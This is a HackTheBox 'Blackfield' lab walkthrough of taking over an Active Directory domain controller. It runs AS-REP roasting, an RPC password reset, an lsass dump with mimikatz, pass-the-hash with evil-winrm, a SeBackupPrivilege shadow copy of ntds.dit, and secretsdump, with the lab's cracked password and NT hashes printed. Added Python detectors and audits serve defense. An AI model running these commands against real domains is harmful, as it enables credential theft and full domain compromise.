
The Blackfield challenge on HackTheBox is perfect for improving your pentesting skills. You will learn how to use nmap, work with Active Directory, and escalate privileges on Windows systems using mimikatz and Evil-WinRM.
The article describes the use of AS-REP Roasting to enumerate users, the use of RPC to change a password and take over an account, and privilege escalation using a shadow copy of NTDS.DIT.
The connection to the lab is via VPN. For safety reasons it is not recommended to use a work computer or a device holding sensitive data, because the connection is to a private network shared with experienced information security professionals.
This machine has an IP address of 10.10.10.192, which I add to /etc/hosts.
10.10.10.192 blackfield.htb
First, open ports are scanned with a small script that takes one argument, the address of the host to scan:
#!/bin/bash
# Fast full-range scan to find open ports, then a detailed scan of only those ports.
ports=$(nmap -p- --min-rate=500 "$1" | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p"$ports" -A "$1"
We see a lot of open ports, but as always, let’s start with SMB.
smbmap -u anonymous -H 10.10.10.192
And the profiles$ directory is available for reading.
smbmap -u anonymous -H 10.10.10.192 -r 'profiles$'
We have a large list of possible user names. We can check which of them actually exist in the domain. When an AS-REP Roasting request is made for a given name, the KDC gives one of three responses:
the user's AS-REP, containing material encrypted with the user's password hash;
the user exists but does not have the UAC flag "Do not require Kerberos preauthentication" set;
the user does not exist in the Kerberos database.
This way we can tell who exists and who does not.
First, let’s get a list.
smbmap -u anonymous -H 10.10.10.192 -r 'profiles$' | grep 2020 | awk -F ' ' '{print $8}' > users.txt
Now let’s perform ASRep-Roasting.
GetNPUsers.py blackfield.local/ -dc-ip 10.10.10.192 -k -no-pass -usersfile ./users.txt
It was unexpected to get a hash in response. The next step is to crack it.
john support.hash -w=./tools/rockyou.txt
And we have a whole account under control. Now let’s get as much information as possible using enum4linux.
enum4linux -u support -p '#00^BlackKnight' -a 10.10.10.192 2>/dev/null
The dump produces a long list of users, but the most valuable information is the group membership. In particular, it turns out that the svc_backup account belongs to the Remote Management Users group (RID 580), which allows remote connection via WinRM.
SMB no longer yields anything useful, and LDAP does not provide anything valuable either. RPC, however, turns out to be useful because of one feature. The next step is to connect to it:
rpcclient 10.10.10.192 -U support
The feature in question is the ability of one user to change the password of another user. This technique is described in detail in the referenced sources and was applied successfully to the user audit2020.
setuserinfo2 audit2020 18 'ralf'
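Detection for the two steps described so far, the AS-REP request sweep against a user list and the reset of one account's password by another account over RPC, as an added example in Python that is not part of the original write-up. It assumes the domain controller's Security log has been exported with one dictionary per event using the EventData field names (EventID, TargetUserName, IpAddress, Status, PreAuthType, SubjectUserName); the sample events, the source address 10.10.14.5, the guessed names and the threshold are constructed. Only the names support and audit2020 come from the write-up.

```python
# Added example, not part of the original write-up: a small detector for an
# AS-REP sweep (event 4768) and a cross-account password reset (event 4724),
# run over Security events already exported as one dict per event.
from collections import defaultdict

# Event 4768 result codes used here (Kerberos error codes).
KDC_SUCCESS = 0x0
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6   # "client not found in Kerberos database"

# Distinct unknown principals from one source before we call it enumeration (constructed).
ENUM_THRESHOLD = 5

# Constructed sample events. Only 'support' and 'audit2020' are names from the write-up.
EVENTS = [
    # A TGT issued (0x0) with no pre-authentication (type 0) and an RC4 ticket:
    # the account does not require pre-authentication, so its AS-REP is crackable offline.
    {"EventID": 4768, "TargetUserName": "support", "IpAddress": "::ffff:10.10.14.5",
     "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    # A normal logon: pre-authentication type 2 (encrypted timestamp), AES ticket.
    {"EventID": 4768, "TargetUserName": "audit2020", "IpAddress": "::ffff:10.10.10.50",
     "Status": "0x0", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
]
# Six guessed names that do not exist, all from the same source: a user-list sweep.
EVENTS += [
    {"EventID": 4768, "TargetUserName": f"guess{i:02d}", "IpAddress": "::ffff:10.10.14.5",
     "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"}
    for i in range(6)
]
# One mistyped name from a workstation: below the threshold, not reported.
EVENTS.append({"EventID": 4768, "TargetUserName": "jsmiht", "IpAddress": "::ffff:10.10.10.50",
               "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"})
# Password resets: one by an expected administrator (constructed) and the
# cross-account reset from the write-up.
EVENTS += [
    {"EventID": 4724, "SubjectUserName": "Administrator", "TargetUserName": "svc_backup"},
    {"EventID": 4724, "SubjectUserName": "support", "TargetUserName": "audit2020"},
]


def roastable_accounts(events):
    """Accounts that were issued a TGT without pre-authentication."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768
                   and int(e["Status"], 16) == KDC_SUCCESS
                   and e["PreAuthType"] == "0"})


def enumeration_sources(events, threshold=ENUM_THRESHOLD):
    """Source addresses that requested TGTs for many distinct non-existent principals."""
    unknown = defaultdict(set)
    for e in events:
        if e["EventID"] == 4768 and int(e["Status"], 16) == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: len(names) for ip, names in unknown.items() if len(names) >= threshold}


def cross_account_resets(events, allowed_subjects):
    """4724 events where the subject reset another account's password and is not an expected resetter."""
    allowed = {s.lower() for s in allowed_subjects}
    return [(e["SubjectUserName"], e["TargetUserName"]) for e in events
            if e["EventID"] == 4724
            and e["SubjectUserName"].lower() != e["TargetUserName"].lower()
            and e["SubjectUserName"].lower() not in allowed]


if __name__ == "__main__":
    print("roastable accounts:", roastable_accounts(EVENTS))
    print("enumeration sources:", enumeration_sources(EVENTS))
    print("cross-account resets:", cross_account_resets(EVENTS, {"Administrator"}))
```

The sweep over users.txt produces the enumeration signal on the domain controller whether or not any account is roastable, because every non-existent name is answered with status 0x6; the roastable-account finding is the one to fix, by clearing "Do not require Kerberos preauthentication" on the account. The reset check needs a list of subjects that legitimately reset passwords (help desk, admin accounts), otherwise every routine reset is reported.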
Now we start analyzing all resources and services from the beginning, because we have another controlled account.
Let’s go to SMB.
smbmap -u audit2020 -p ralf -d blackfield.local -H 10.10.10.192
There is a lot to read, it is better to output all the content recursively and view it in one go.
smbmap -u audit2020 -p ralf -d blackfield.local -H 10.10.10.192 -R
In the forensic\memory_analysis folder we find what appears to be a dump of the lsass process, from which credentials can be recovered with mimikatz. We download this file.
smbclient.py blackfield.local/audit2020:ralf@10.10.10.192
Now we switch to a Windows machine and process the dump with mimikatz, which yields the NT hash of svc_backup.
Knowing the hash, we use Evil-WinRM to connect as svc_backup.
evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Let’s look at the user’s groups and privileges.
We have the SeBackupPrivilege privilege. It lets us create a shadow copy of the volume holding the NTDS database, which contains the credentials of every domain account. Even with a copy made, we cannot simply copy the file out with ordinary file access; for that we need the DLL libraries of a PowerShell module that copies files using the backup privilege (Copy-FileSeBackupPrivilege).
Let's make a shadow copy. Create a file (ds.txt) with the following contents.
SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias ralfcopy
create
expose %ralfcopy% z:
And now let’s upload it and the downloaded libraries to the host.
Let’s perform a shadow copy.
diskshadow /s ds.txt
And copy the file out of the shadow copy.
Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
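The right that makes the shadow-copy step possible is SeBackupPrivilege, so the check a defender wants is who holds it on a domain controller. The following is an added example in Python, not part of the original write-up, that audits the user-rights assignment exported with `secedit /export /cfg rights.inf /areas USER_RIGHTS` against a baseline. The INF text is constructed; the only real values in it are the well-known built-in SIDs (S-1-5-32-544 Administrators, S-1-5-32-549 Server Operators, S-1-5-32-551 Backup Operators), and the extra domain SID is a placeholder.

```python
# Added example, not part of the original write-up: find principals that hold
# SeBackupPrivilege / SeRestorePrivilege beyond the default holders on a domain
# controller, using a secedit user-rights export.

# Default holders of the backup/restore rights on a domain controller (well-known SIDs):
# Administrators (544), Server Operators (549), Backup Operators (551).
DC_BASELINE = {
    "SeBackupPrivilege":  {"S-1-5-32-544", "S-1-5-32-549", "S-1-5-32-551"},
    "SeRestorePrivilege": {"S-1-5-32-544", "S-1-5-32-549", "S-1-5-32-551"},
}

# Constructed export. The domain SID ending in -1413 is a placeholder for a
# user or group granted the right directly.
SAMPLE_INF = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-551,*S-1-5-21-1111111111-2222222222-3333333333-1413
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-551
SeDebugPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(inf_text):
    """Return {privilege: set of SIDs} from the [Privilege Rights] section of a secedit export."""
    rights, in_section = {}, False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # Each holder is written as *SID; strip the marker and ignore empty entries.
        sids = {v.strip().lstrip("*") for v in value.split(",") if v.strip()}
        rights[name.strip()] = sids
    return rights


def unexpected_holders(inf_text, baseline=DC_BASELINE):
    """Holders of each baselined right that are not in the baseline, keyed by right name."""
    rights = parse_privilege_rights(inf_text)
    findings = {}
    for priv, expected in baseline.items():
        extra = rights.get(priv, set()) - expected
        if extra:
            findings[priv] = sorted(extra)
    return findings


if __name__ == "__main__":
    for priv, sids in unexpected_holders(SAMPLE_INF).items():
        print(f"{priv}: unexpected holders {sids}")
```

secedit writes the export as UTF-16, so open a real file with encoding="utf-16". The check only catches rights granted directly; an account that gets SeBackupPrivilege by being a member of Backup Operators will not appear here, so the membership of the three baseline groups has to be reviewed alongside this output, and on a domain controller that membership should be treated as equivalent to domain administration.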
The hashes inside ntds.dit are encrypted with a key derived from the SYSTEM registry hive, which is easy to save.
reg save HKLM\SYSTEM C:\Temp\SYSTEM
We download both files from the machine.
We extract the hashes using the secretsdump utility from the impacket package.
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
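The same dump a defender obtains from an authorised backup is the basis of a domain password audit, and that is what this added Python example, not part of the original write-up, shows: it reads secretsdump-style output and flags accounts with an empty password, accounts that still store an LM hash, and accounts that share an NT hash (the same password). The two NT hashes for Administrator and svc_backup are the ones shown in the write-up; every other line, name, RID and hash in the sample is constructed.

```python
# Added example, not part of the original write-up: password-hygiene audit over a
# secretsdump NTDS dump (domain\user:rid:lmhash:nthash::: lines).
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password / LM not stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

# Hash lines only; Kerberos-key and cleartext lines have a different shape and are skipped.
LINE_RE = re.compile(r"^(?P<acct>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")

# Constructed sample. Administrator and svc_backup NT hashes are from the write-up;
# DC01$, legacyapp, the RIDs and the remaining hashes are placeholders.
SAMPLE_DUMP = r"""[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f:::
BLACKFIELD.local\svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::
BLACKFIELD.local\support:1104:aad3b435b51404eeaad3b435b51404ee:1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a:::
BLACKFIELD.local\audit2020:1103:aad3b435b51404eeaad3b435b51404ee:1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a:::
BLACKFIELD.local\legacyapp:1500:0123456789abcdef0123456789abcdef:2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
"""


def parse_dump(text):
    """Yield (account, rid, lm_hash, nt_hash) for every hash line in a secretsdump output."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m["acct"], int(m["rid"]), m["lm"], m["nt"]


def audit_dump(text):
    """Flag empty passwords, stored LM hashes, and NT hashes shared by several accounts."""
    empty, lm_stored, by_nt = [], [], defaultdict(list)
    for acct, rid, lm, nt in parse_dump(text):
        if nt == EMPTY_NT:
            empty.append(acct)
        if lm != EMPTY_LM:
            lm_stored.append(acct)
        if not acct.endswith("$"):          # machine accounts have random passwords; skip for reuse
            by_nt[nt].append(acct)
    shared = {nt: accts for nt, accts in by_nt.items() if len(accts) > 1}
    return {"empty_password": empty, "lm_stored": lm_stored, "shared_nt": shared}


if __name__ == "__main__":
    report = audit_dump(SAMPLE_DUMP)
    print("empty password:", report["empty_password"])
    print("LM hash stored:", report["lm_stored"])
    for nt, accts in report["shared_nt"].items():
        print("shared NT hash", nt, "->", accts)
```

An empty NT hash on a disabled account (Guest in the sample) is expected, so pair this with the account status when acting on the report; a shared hash between a user account and a service account, as between support and audit2020 in the constructed sample, is the finding that typically turns one compromised password into several.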
Let’s connect as an administrator.
evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
Full control over this machine has been obtained.
The write-up demonstrated AS-REP Roasting for user enumeration, an RPC password change to take over an account, a shadow copy of NTDS.DIT obtained with SeBackupPrivilege, and hash extraction with secretsdump from impacket.